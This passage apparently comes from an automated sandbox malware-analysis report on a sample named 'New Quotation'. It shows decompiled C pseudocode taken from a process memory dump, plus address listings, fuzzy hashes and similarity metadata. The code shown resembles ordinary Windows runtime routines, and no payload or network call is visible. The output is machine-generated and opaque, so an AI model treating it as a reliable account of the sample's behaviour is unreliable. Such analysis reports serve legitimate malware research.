							 *_t269 = _t394;
							 *((intOrPtr*)(_t366 + 0x20)) = _t410;
							while(1) {
								_v76 =  *0x7FFE03B4;
								_v80 =  *0x7ffe03b0;
								while(1) {
									_t368 =  *0x7ffe000c;
									_t400 =  *0x7ffe0008;
									__eflags = _t368 -  *0x7ffe0010;
									if(_t368 ==  *0x7ffe0010) {
										break;
									}
									asm("pause");
								}
								_t416 =  *((intOrPtr*)(0x7ffe03b4));
								_t344 = _v76;
								__eflags = _v80 -  *0x7ffe03b0;
								if(_v80 !=  *0x7ffe03b0) {
									L63:
									asm("pause");
									continue;
								}
								__eflags = _t344 - _t416;
								if(_t344 != _t416) {
									goto L63;
								}
								_t401 = _t400 - _v80;
								__eflags = _t401;
								_t273 = _v72;
								_t426 = _v68;
								asm("sbb ecx, ebx");
								_t336 = _v84;
								 *(_t273 + 0x28) = _t401;
								 *(_t273 + 0x2c) = _t368;
								_t394 =  *((intOrPtr*)(_t426 + 0x30));
								goto L46;
							}
						}
						L46:
						_t359 = _a4;
						_push(_t426);
						 *((intOrPtr*)(_t359 + 0x30)) = _t394;
						 *((intOrPtr*)(_t359 + 0x34)) =  *((intOrPtr*)(_t426 + 0x34));
						_t411 =  *((intOrPtr*)(_t426 + 0x30));
						_push( *((intOrPtr*)(_t426 + 0x34)));
						_push(_t359);
						__eflags = _t411 - E1D7D71F0;
						if(_t411 == E1D7D71F0) {
							E1D7D71F0(_t336, _t359, _t411, _t426);
						} else {
							 *0x1d8c91e0();
							 *_t411();
						}
						_t260 =  *( *[fs:0x30] + 0x50);
						__eflags = _t260;
						if(_t260 != 0) {
							__eflags =  *_t260;
							if( *_t260 == 0) {
								goto L49;
							} else {
								_t250 =  *( *[fs:0x30] + 0x50) + 0x22c;
								goto L50;
							}
							goto L126;
						} else {
							L49:
							_t250 = 0x7ffe0386;
						}
						L50:
						__eflags =  *_t250;
						if( *_t250 != 0) {
							_t250 = E1D8A4CD2( *((intOrPtr*)(_t426 + 0x5c)), _a8,  *((intOrPtr*)(_t426 + 0x30)),  *((intOrPtr*)(_t426 + 0x34)),  *((intOrPtr*)(_t426 + 0x3c)));
						}
						__eflags = _t336;
						if(_t336 != 0) {
							while(1) {
								_v68 =  *0x7ffe03b0;
								_v72 =  *((intOrPtr*)(0x7ffe03b4));
								while(1) {
									_t250 =  *0x7ffe000c;
									_t397 =  *0x7ffe0008;
									__eflags = _t250 -  *0x7ffe0010;
									if(_t250 ==  *0x7ffe0010) {
										break;
									}
									asm("pause");
								}
								_t339 = _v68;
								_t429 =  *((intOrPtr*)(0x7ffe03b4));
								_t414 = _v72;
								__eflags = _t339 -  *0x7ffe03b0;
								if(_t339 !=  *0x7ffe03b0) {
									L64:
									asm("pause");
									continue;
								}
								__eflags = _t414 - _t429;
								if(_t414 != _t429) {
									goto L64;
								}
								_t398 = _t397 - _t339;
								_t340 = _v84;
								asm("sbb eax, edi");
								_t364 =  *(_t340 + 0x10);
								__eflags = _t250 -  *(_t340 + 0x14);
								if(__eflags > 0) {
									L60:
									_t399 = _t398 - _t364;
									__eflags = _t399;
									 *(_t340 + 0x10) = _t399;
									asm("sbb eax, esi");
									 *(_t340 + 0x14) = _t250;
								} else {
									if(__eflags >= 0) {
										__eflags = _t398 - _t364;
										if(_t398 >= _t364) {
											goto L60;
										}
									}
								}
								goto L61;
							}
						}
					}
					L61:
					return _t250;
				}
				goto L126;
			}










































































































                                                                                                                                                                                          0x1d7d697f
                                                                                                                                                                                          0x1d7d6985
                                                                                                                                                                                          0x1d7d698f
                                                                                                                                                                                          0x1d7d6991
                                                                                                                                                                                          0x1d7d6994
                                                                                                                                                                                          0x1d7d69a0
                                                                                                                                                                                          0x1d7d69ac
                                                                                                                                                                                          0x1d7d69ae
                                                                                                                                                                                          0x1d7d69b4
                                                                                                                                                                                          0x1d7d69b6
                                                                                                                                                                                          0x1d7d69b9
                                                                                                                                                                                          0x1d7d69bc
                                                                                                                                                                                          0x1d7d69c1
                                                                                                                                                                                          0x1d7d6b49
                                                                                                                                                                                          0x1d7d6b4f
                                                                                                                                                                                          0x1d7d6b55
                                                                                                                                                                                          0x1d7d6b57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6b5d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6b5d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d69c7
                                                                                                                                                                                          0x1d7d69c7
                                                                                                                                                                                          0x1d7d69c7
                                                                                                                                                                                          0x1d7d69c7
                                                                                                                                                                                          0x1d7d69cc
                                                                                                                                                                                          0x1d7d69d2
                                                                                                                                                                                          0x1d830fa1
                                                                                                                                                                                          0x1d830fa8
                                                                                                                                                                                          0x1d830fae
                                                                                                                                                                                          0x1d830fb3
                                                                                                                                                                                          0x1d830fb9
                                                                                                                                                                                          0x1d830fbc
                                                                                                                                                                                          0x1d830fbc
                                                                                                                                                                                          0x1d7d69d8
                                                                                                                                                                                          0x1d7d69da
                                                                                                                                                                                          0x1d7d69df
                                                                                                                                                                                          0x1d7d69e1
                                                                                                                                                                                          0x1d7d69e4
                                                                                                                                                                                          0x1d7d69f0
                                                                                                                                                                                          0x1d7d69f7
                                                                                                                                                                                          0x1d7d69fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6a00
                                                                                                                                                                                          0x1d7d6a09
                                                                                                                                                                                          0x1d830fc4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6a0f
                                                                                                                                                                                          0x1d7d6a0f
                                                                                                                                                                                          0x1d7d6a12
                                                                                                                                                                                          0x1d7d6a12
                                                                                                                                                                                          0x1d7d6a09
                                                                                                                                                                                          0x1d7d6a15
                                                                                                                                                                                          0x1d7d6a15
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d830fc7
                                                                                                                                                                                          0x1d830fc7
                                                                                                                                                                                          0x1d830fc8
                                                                                                                                                                                          0x1d830fcb
                                                                                                                                                                                          0x1d830fce
                                                                                                                                                                                          0x1d830fce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d830fd6
                                                                                                                                                                                          0x1d7d6a18
                                                                                                                                                                                          0x1d7d6a1a
                                                                                                                                                                                          0x1d830fdb
                                                                                                                                                                                          0x1d830fdd
                                                                                                                                                                                          0x1d830fdd
                                                                                                                                                                                          0x1d7d6a24
                                                                                                                                                                                          0x1d7d6a2a
                                                                                                                                                                                          0x1d7d6a2d
                                                                                                                                                                                          0x1d7d6a33
                                                                                                                                                                                          0x1d7d6a38
                                                                                                                                                                                          0x1d831005
                                                                                                                                                                                          0x1d831008
                                                                                                                                                                                          0x1d83100a
                                                                                                                                                                                          0x1d831011
                                                                                                                                                                                          0x1d83101c
                                                                                                                                                                                          0x1d831013
                                                                                                                                                                                          0x1d831016
                                                                                                                                                                                          0x1d831016
                                                                                                                                                                                          0x1d831026
                                                                                                                                                                                          0x1d831026
                                                                                                                                                                                          0x1d83102a
                                                                                                                                                                                          0x1d831033
                                                                                                                                                                                          0x1d83103b
                                                                                                                                                                                          0x1d831046
                                                                                                                                                                                          0x1d831049
                                                                                                                                                                                          0x1d83104e
                                                                                                                                                                                          0x1d831050
                                                                                                                                                                                          0x1d831062
                                                                                                                                                                                          0x1d831052
                                                                                                                                                                                          0x1d83105b
                                                                                                                                                                                          0x1d83105b
                                                                                                                                                                                          0x1d831067
                                                                                                                                                                                          0x1d83106a
                                                                                                                                                                                          0x1d83106f
                                                                                                                                                                                          0x1d831078
                                                                                                                                                                                          0x1d831078
                                                                                                                                                                                          0x1d83107d
                                                                                                                                                                                          0x1d831080
                                                                                                                                                                                          0x1d831084
                                                                                                                                                                                          0x1d83108f
                                                                                                                                                                                          0x1d831090
                                                                                                                                                                                          0x1d831092
                                                                                                                                                                                          0x1d831093
                                                                                                                                                                                          0x1d831097
                                                                                                                                                                                          0x1d831098
                                                                                                                                                                                          0x1d83109a
                                                                                                                                                                                          0x1d83109c
                                                                                                                                                                                          0x1d8310a0
                                                                                                                                                                                          0x1d8310a7
                                                                                                                                                                                          0x1d8310ac
                                                                                                                                                                                          0x1d8310b1
                                                                                                                                                                                          0x1d8310b2
                                                                                                                                                                                          0x1d8310b4
                                                                                                                                                                                          0x1d8310b6
                                                                                                                                                                                          0x1d8310bb
                                                                                                                                                                                          0x1d8310bb
                                                                                                                                                                                          0x1d7d6a3e
                                                                                                                                                                                          0x1d7d6a41
                                                                                                                                                                                          0x1d830fe5
                                                                                                                                                                                          0x1d830fec
                                                                                                                                                                                          0x1d830ff2
                                                                                                                                                                                          0x1d830ffc
                                                                                                                                                                                          0x1d830ffc
                                                                                                                                                                                          0x1d830fec
                                                                                                                                                                                          0x1d7d6a41
                                                                                                                                                                                          0x1d7d6a4d
                                                                                                                                                                                          0x1d7d6a53
                                                                                                                                                                                          0x1d8310c3
                                                                                                                                                                                          0x1d8310ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8310d0
                                                                                                                                                                                          0x1d8310d2
                                                                                                                                                                                          0x1d8310d7
                                                                                                                                                                                          0x1d8310d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8310db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8310db
                                                                                                                                                                                          0x1d8310d9
                                                                                                                                                                                          0x1d7d6a59
                                                                                                                                                                                          0x1d7d6a59
                                                                                                                                                                                          0x1d7d6a5c
                                                                                                                                                                                          0x1d7d6a63
                                                                                                                                                                                          0x1d7d6a66
                                                                                                                                                                                          0x1d7d6a69
                                                                                                                                                                                          0x1d7d6a6c
                                                                                                                                                                                          0x1d7d6a70
                                                                                                                                                                                          0x1d7d6a72
                                                                                                                                                                                          0x1d7d6a74
                                                                                                                                                                                          0x1d7d6a78
                                                                                                                                                                                          0x1d7d6a7d
                                                                                                                                                                                          0x1d7d6a7f
                                                                                                                                                                                          0x1d7d6a85
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6a8b
                                                                                                                                                                                          0x1d7d6a90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6a96
                                                                                                                                                                                          0x1d7d6a96
                                                                                                                                                                                          0x1d7d6a9a
                                                                                                                                                                                          0x1d7d6aa2
                                                                                                                                                                                          0x1d7d6aa6
                                                                                                                                                                                          0x1d7d6aab
                                                                                                                                                                                          0x1d8310e3
                                                                                                                                                                                          0x1d8310e7
                                                                                                                                                                                          0x1d8310ea
                                                                                                                                                                                          0x1d8310ed
                                                                                                                                                                                          0x1d8310f0
                                                                                                                                                                                          0x1d8310fc
                                                                                                                                                                                          0x1d831100
                                                                                                                                                                                          0x1d831104
                                                                                                                                                                                          0x1d831106
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831108
                                                                                                                                                                                          0x1d831108
                                                                                                                                                                                          0x1d83110c
                                                                                                                                                                                          0x1d831110
                                                                                                                                                                                          0x1d831113
                                                                                                                                                                                          0x1d83111a
                                                                                                                                                                                          0x1d83111f
                                                                                                                                                                                          0x1d83111f
                                                                                                                                                                                          0x1d831113
                                                                                                                                                                                          0x1d7d6ab7
                                                                                                                                                                                          0x1d7d6ab9
                                                                                                                                                                                          0x1d7d6abb
                                                                                                                                                                                          0x1d7d6b2e
                                                                                                                                                                                          0x1d7d6b2f
                                                                                                                                                                                          0x1d7d6b32
                                                                                                                                                                                          0x1d7d6b35
                                                                                                                                                                                          0x1d7d6b38
                                                                                                                                                                                          0x1d7d6b3b
                                                                                                                                                                                          0x1d7d6b3e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6b44
                                                                                                                                                                                          0x1d831129
                                                                                                                                                                                          0x1d83112c
                                                                                                                                                                                          0x1d83112f
                                                                                                                                                                                          0x1d83112f
                                                                                                                                                                                          0x1d831136
                                                                                                                                                                                          0x1d831193
                                                                                                                                                                                          0x1d831193
                                                                                                                                                                                          0x1d831138
                                                                                                                                                                                          0x1d831138
                                                                                                                                                                                          0x1d83113b
                                                                                                                                                                                          0x1d83113d
                                                                                                                                                                                          0x1d83113d
                                                                                                                                                                                          0x1d83113f
                                                                                                                                                                                          0x1d831146
                                                                                                                                                                                          0x1d831149
                                                                                                                                                                                          0x1d831151
                                                                                                                                                                                          0x1d831156
                                                                                                                                                                                          0x1d831158
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83115e
                                                                                                                                                                                          0x1d831164
                                                                                                                                                                                          0x1d83116a
                                                                                                                                                                                          0x1d83116c
                                                                                                                                                                                          0x1d83116e
                                                                                                                                                                                          0x1d831171
                                                                                                                                                                                          0x1d831173
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831175
                                                                                                                                                                                          0x1d831178
                                                                                                                                                                                          0x1d83117b
                                                                                                                                                                                          0x1d83117c
                                                                                                                                                                                          0x1d83117f
                                                                                                                                                                                          0x1d831182
                                                                                                                                                                                          0x1d831185
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831185
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831173
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831187
                                                                                                                                                                                          0x1d831187
                                                                                                                                                                                          0x1d83118e
                                                                                                                                                                                          0x1d83118e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83113d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831136
                                                                                                                                                                                          0x1d7d6abd
                                                                                                                                                                                          0x1d7d6abd
                                                                                                                                                                                          0x1d7d6ac0
                                                                                                                                                                                          0x1d7d6ac3
                                                                                                                                                                                          0x1d7d6ac6
                                                                                                                                                                                          0x1d7d6ac9
                                                                                                                                                                                          0x1d7d6acf
                                                                                                                                                                                          0x1d7d6ad8
                                                                                                                                                                                          0x1d7d6adb
                                                                                                                                                                                          0x1d7d6ae3
                                                                                                                                                                                          0x1d8311ba
                                                                                                                                                                                          0x1d8311bd
                                                                                                                                                                                          0x1d8311bf
                                                                                                                                                                                          0x1d8311c6
                                                                                                                                                                                          0x1d8311d1
                                                                                                                                                                                          0x1d8311c8
                                                                                                                                                                                          0x1d8311cb
                                                                                                                                                                                          0x1d8311cb
                                                                                                                                                                                          0x1d8311db
                                                                                                                                                                                          0x1d8311db
                                                                                                                                                                                          0x1d8311df
                                                                                                                                                                                          0x1d8311e2
                                                                                                                                                                                          0x1d8311e8
                                                                                                                                                                                          0x1d8311f3
                                                                                                                                                                                          0x1d8311fe
                                                                                                                                                                                          0x1d831201
                                                                                                                                                                                          0x1d831206
                                                                                                                                                                                          0x1d831208
                                                                                                                                                                                          0x1d83121a
                                                                                                                                                                                          0x1d83120a
                                                                                                                                                                                          0x1d831213
                                                                                                                                                                                          0x1d831213
                                                                                                                                                                                          0x1d83121f
                                                                                                                                                                                          0x1d831222
                                                                                                                                                                                          0x1d83122a
                                                                                                                                                                                          0x1d831232
                                                                                                                                                                                          0x1d831232
                                                                                                                                                                                          0x1d831237
                                                                                                                                                                                          0x1d83123a
                                                                                                                                                                                          0x1d83123e
                                                                                                                                                                                          0x1d831249
                                                                                                                                                                                          0x1d83124a
                                                                                                                                                                                          0x1d83124c
                                                                                                                                                                                          0x1d83124d
                                                                                                                                                                                          0x1d831251
                                                                                                                                                                                          0x1d831252
                                                                                                                                                                                          0x1d831254
                                                                                                                                                                                          0x1d831256
                                                                                                                                                                                          0x1d83125a
                                                                                                                                                                                          0x1d831261
                                                                                                                                                                                          0x1d831266
                                                                                                                                                                                          0x1d83126b
                                                                                                                                                                                          0x1d83126c
                                                                                                                                                                                          0x1d83126e
                                                                                                                                                                                          0x1d831270
                                                                                                                                                                                          0x1d831270
                                                                                                                                                                                          0x1d7d6ae9
                                                                                                                                                                                          0x1d7d6aec
                                                                                                                                                                                          0x1d83119a
                                                                                                                                                                                          0x1d8311a1
                                                                                                                                                                                          0x1d8311a7
                                                                                                                                                                                          0x1d8311b1
                                                                                                                                                                                          0x1d8311b1
                                                                                                                                                                                          0x1d8311a1
                                                                                                                                                                                          0x1d7d6aec
                                                                                                                                                                                          0x1d7d6af8
                                                                                                                                                                                          0x1d7d6b65
                                                                                                                                                                                          0x1d7d6afa
                                                                                                                                                                                          0x1d7d6afa
                                                                                                                                                                                          0x1d7d6b03
                                                                                                                                                                                          0x1d7d6b62
                                                                                                                                                                                          0x1d7d6b05
                                                                                                                                                                                          0x1d7d6b05
                                                                                                                                                                                          0x1d7d6b05
                                                                                                                                                                                          0x1d7d6b03
                                                                                                                                                                                          0x1d7d6b0a
                                                                                                                                                                                          0x1d7d6b10
                                                                                                                                                                                          0x1d7d6b15
                                                                                                                                                                                          0x1d7d6b18
                                                                                                                                                                                          0x1d7d6b19
                                                                                                                                                                                          0x1d7d6b25
                                                                                                                                                                                          0x1d7d6b25
                                                                                                                                                                                          0x1d7d6abb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6a90
                                                                                                                                                                                          0x1d83127f
                                                                                                                                                                                          0x1d831281
                                                                                                                                                                                          0x1d831284
                                                                                                                                                                                          0x1d7d6b99
                                                                                                                                                                                          0x1d83128a
                                                                                                                                                                                          0x1d831293
                                                                                                                                                                                          0x1d831293
                                                                                                                                                                                          0x1d7d6b9e
                                                                                                                                                                                          0x1d7d6ba1
                                                                                                                                                                                          0x1d8312ab
                                                                                                                                                                                          0x1d8312ab
                                                                                                                                                                                          0x1d7d6bae
                                                                                                                                                                                          0x1d7d6bb3
                                                                                                                                                                                          0x1d7d6bb5
                                                                                                                                                                                          0x1d7d6bc1
                                                                                                                                                                                          0x1d7d6bc4
                                                                                                                                                                                          0x1d7d6bc6
                                                                                                                                                                                          0x1d8312b5
                                                                                                                                                                                          0x1d8312b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8312be
                                                                                                                                                                                          0x1d8312c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8312c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6bcc
                                                                                                                                                                                          0x1d7d6bcc
                                                                                                                                                                                          0x1d7d6bcc
                                                                                                                                                                                          0x1d7d6bcc
                                                                                                                                                                                          0x1d7d6bd1
                                                                                                                                                                                          0x1d7d6bd1
                                                                                                                                                                                          0x1d7d6bd4
                                                                                                                                                                                          0x1d8312df
                                                                                                                                                                                          0x1d8312df
                                                                                                                                                                                          0x1d7d6be0
                                                                                                                                                                                          0x1d7d6be3
                                                                                                                                                                                          0x1d7d6be6
                                                                                                                                                                                          0x1d7d6be9
                                                                                                                                                                                          0x1d7d6bef
                                                                                                                                                                                          0x1d7d6bf1
                                                                                                                                                                                          0x1d8312e9
                                                                                                                                                                                          0x1d8312eb
                                                                                                                                                                                          0x1d7d6bf7
                                                                                                                                                                                          0x1d7d6bff
                                                                                                                                                                                          0x1d7d6c03
                                                                                                                                                                                          0x1d7d6c03
                                                                                                                                                                                          0x1d7d6c06
                                                                                                                                                                                          0x1d7d6c0c
                                                                                                                                                                                          0x1d7d6c0f
                                                                                                                                                                                          0x1d7d6c12
                                                                                                                                                                                          0x1d7d6c15
                                                                                                                                                                                          0x1d7d6c19
                                                                                                                                                                                          0x1d7d6c1d
                                                                                                                                                                                          0x1d7d6c1f
                                                                                                                                                                                          0x1d7d6c22
                                                                                                                                                                                          0x1d7d6c31
                                                                                                                                                                                          0x1d7d6c3a
                                                                                                                                                                                          0x1d7d6c40
                                                                                                                                                                                          0x1d7d6c40
                                                                                                                                                                                          0x1d7d6c42
                                                                                                                                                                                          0x1d7d6c46
                                                                                                                                                                                          0x1d7d6c48
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6c4a
                                                                                                                                                                                          0x1d7d6c4a
                                                                                                                                                                                          0x1d7d6c55
                                                                                                                                                                                          0x1d7d6c58
                                                                                                                                                                                          0x1d7d6c5c
                                                                                                                                                                                          0x1d7d6c60
                                                                                                                                                                                          0x1d7d6d52
                                                                                                                                                                                          0x1d7d6d52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6d52
                                                                                                                                                                                          0x1d7d6c66
                                                                                                                                                                                          0x1d7d6c68
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6c6e
                                                                                                                                                                                          0x1d7d6c6e
                                                                                                                                                                                          0x1d7d6c72
                                                                                                                                                                                          0x1d7d6c76
                                                                                                                                                                                          0x1d7d6c7a
                                                                                                                                                                                          0x1d7d6c7c
                                                                                                                                                                                          0x1d7d6c80
                                                                                                                                                                                          0x1d7d6c83
                                                                                                                                                                                          0x1d7d6c86
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6c86
                                                                                                                                                                                          0x1d7d6c22
                                                                                                                                                                                          0x1d7d6c89
                                                                                                                                                                                          0x1d7d6c89
                                                                                                                                                                                          0x1d7d6c8c
                                                                                                                                                                                          0x1d7d6c8d
                                                                                                                                                                                          0x1d7d6c93
                                                                                                                                                                                          0x1d7d6c99
                                                                                                                                                                                          0x1d7d6c9c
                                                                                                                                                                                          0x1d7d6c9d
                                                                                                                                                                                          0x1d7d6c9e
                                                                                                                                                                                          0x1d7d6ca4
                                                                                                                                                                                          0x1d7d6d48
                                                                                                                                                                                          0x1d7d6caa
                                                                                                                                                                                          0x1d7d6cac
                                                                                                                                                                                          0x1d7d6cb2
                                                                                                                                                                                          0x1d7d6cb2
                                                                                                                                                                                          0x1d7d6cba
                                                                                                                                                                                          0x1d7d6cbd
                                                                                                                                                                                          0x1d7d6cbf
                                                                                                                                                                                          0x1d8312f4
                                                                                                                                                                                          0x1d8312f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8312fd
                                                                                                                                                                                          0x1d831306
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d831306
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6cc5
                                                                                                                                                                                          0x1d7d6cc5
                                                                                                                                                                                          0x1d7d6cc5
                                                                                                                                                                                          0x1d7d6cc5
                                                                                                                                                                                          0x1d7d6cca
                                                                                                                                                                                          0x1d7d6cca
                                                                                                                                                                                          0x1d7d6ccd
                                                                                                                                                                                          0x1d83131f
                                                                                                                                                                                          0x1d83131f
                                                                                                                                                                                          0x1d7d6cd3
                                                                                                                                                                                          0x1d7d6cd5
                                                                                                                                                                                          0x1d7d6cd7
                                                                                                                                                                                          0x1d7d6ce3
                                                                                                                                                                                          0x1d7d6cec
                                                                                                                                                                                          0x1d7d6cf5
                                                                                                                                                                                          0x1d7d6cf5
                                                                                                                                                                                          0x1d7d6cfc
                                                                                                                                                                                          0x1d7d6d00
                                                                                                                                                                                          0x1d7d6d02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6d04
                                                                                                                                                                                          0x1d7d6d04
                                                                                                                                                                                          0x1d7d6d0a
                                                                                                                                                                                          0x1d7d6d0e
                                                                                                                                                                                          0x1d7d6d11
                                                                                                                                                                                          0x1d7d6d15
                                                                                                                                                                                          0x1d7d6d17
                                                                                                                                                                                          0x1d7d6d59
                                                                                                                                                                                          0x1d7d6d59
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6d59
                                                                                                                                                                                          0x1d7d6d19
                                                                                                                                                                                          0x1d7d6d1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6d1d
                                                                                                                                                                                          0x1d7d6d1f
                                                                                                                                                                                          0x1d7d6d23
                                                                                                                                                                                          0x1d7d6d28
                                                                                                                                                                                          0x1d7d6d2b
                                                                                                                                                                                          0x1d7d6d2d
                                                                                                                                                                                          0x1d7d6d35
                                                                                                                                                                                          0x1d7d6d35
                                                                                                                                                                                          0x1d7d6d35
                                                                                                                                                                                          0x1d7d6d37
                                                                                                                                                                                          0x1d7d6d3a
                                                                                                                                                                                          0x1d7d6d3c
                                                                                                                                                                                          0x1d7d6d2f
                                                                                                                                                                                          0x1d7d6d2f
                                                                                                                                                                                          0x1d7d6d31
                                                                                                                                                                                          0x1d7d6d33
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6d33
                                                                                                                                                                                          0x1d7d6d2f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d6d2d
                                                                                                                                                                                          0x1d7d6cd7
                                                                                                                                                                                          0x1d7d6cd5
                                                                                                                                                                                          0x1d7d6d3f
                                                                                                                                                                                          0x1d7d6d45
                                                                                                                                                                                          0x1d7d6d45
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1239c26fad3570f8ed44f0b162904edc8caafd82207fcf4c8b04331977983215
                                                                                                                                                                                          • Instruction ID: 9f12db326a568aa1e1ff4b7914868d10310736fd2fc91e7dc34ca25c560492c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1239c26fad3570f8ed44f0b162904edc8caafd82207fcf4c8b04331977983215
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D32AD70A04649DFCB45CFA8C480BAEB7F1FF48710F11866AE959AB391D734E845CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7ECF00 Relevance: 1.8, APIs: 1, Instructions: 345timeCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E1D7ECF00(void* __ecx, signed int __edx, signed int _a4, signed short* _a8, signed int _a12, signed int* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v140;
				char _v165;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v181;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int* _v220;
				char _v224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t118;
				signed int _t122;
				void* _t124;
				signed int _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				signed int _t143;
				intOrPtr _t146;
				signed int _t147;
				signed char _t154;
				intOrPtr _t156;
				intOrPtr _t160;
				void* _t165;
				signed int _t167;
				signed int _t168;
				void* _t169;
				signed int _t170;
				signed int _t174;
				void* _t175;
				void* _t176;
				signed short _t177;
				unsigned int _t181;
				signed char _t187;
				signed char _t189;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t213;
				void* _t215;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed short* _t223;
				signed int _t225;
				void* _t226;
				signed int _t228;
				void* _t230;
				signed int _t231;

				_t211 = __edx;
				_t176 = __ecx;
				_v8 =  *0x1d8cb370 ^ _t231;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_v208 = _a12;
				_t223 = _a8;
				_v220 = _a16;
				_v196 = _a24;
				_v180 = 0;
				_v165 = 0;
				if( *_t2 == 0) {
					L2:
					_v200 = 9;
				} else {
					_t165 = E1D7F2180(0x1d8c32d8);
					_v200 = 6;
					if(_t165 == 0) {
						goto L2;
					}
				}
				if(_t223 == 0) {
					_t118 = 0;
					__eflags = 0;
					_v172 = 0;
					L13:
					_t167 = _a4;
					_t224 = _v188;
					_v212 = _t118;
					while(1) {
						_t218 = 0;
						_t177 = 0x1000;
						_v176 = 0;
						__eflags = _t167;
						if(_t167 == 0) {
							break;
						}
						__eflags = _t167 -  *0x1d8c5d6c; // 0x772d0000
						if(__eflags != 0) {
							L1D7E2330(_t118, 0x1d8c6668);
							_t187 =  *0x1d8c67a8; // 0x18e2bd0
							_t130 =  *0x1d8c67a4; // 0x18e3068
							__eflags = _t187 & 0x00000001;
							if((_t187 & 0x00000001) != 0) {
								__eflags = _t130;
								if(_t130 == 0) {
									_t130 = 0;
									__eflags = 0;
								} else {
									_t130 = _t130 ^ 0x1d8c67a4;
								}
							}
							_t213 = _t187 & 1;
							__eflags = _t130;
							if(_t130 == 0) {
								L32:
								_t211 = _t218;
							} else {
								do {
									_t41 = _t130 - 0x50; // 0x75340000
									__eflags = _t167 -  *_t41;
									if(__eflags < 0) {
										_t207 =  *_t130;
										L27:
										__eflags = _t213;
										if(_t213 == 0) {
											L30:
											_t130 = _t207;
										} else {
											__eflags = _t207;
											if(_t207 == 0) {
												goto L30;
											} else {
												_t130 = _t130 ^ _t207;
											}
										}
										goto L31;
									} else {
										if(__eflags <= 0) {
											__eflags = _t130;
											if(_t130 == 0) {
												goto L32;
											} else {
												_t47 = _t130 - 0x18; // 0x18e30b0
												_t208 =  *_t47;
												_t48 = _t130 - 0x68; // 0x18e3000
												_t211 = _t48;
												_v176 = _t211;
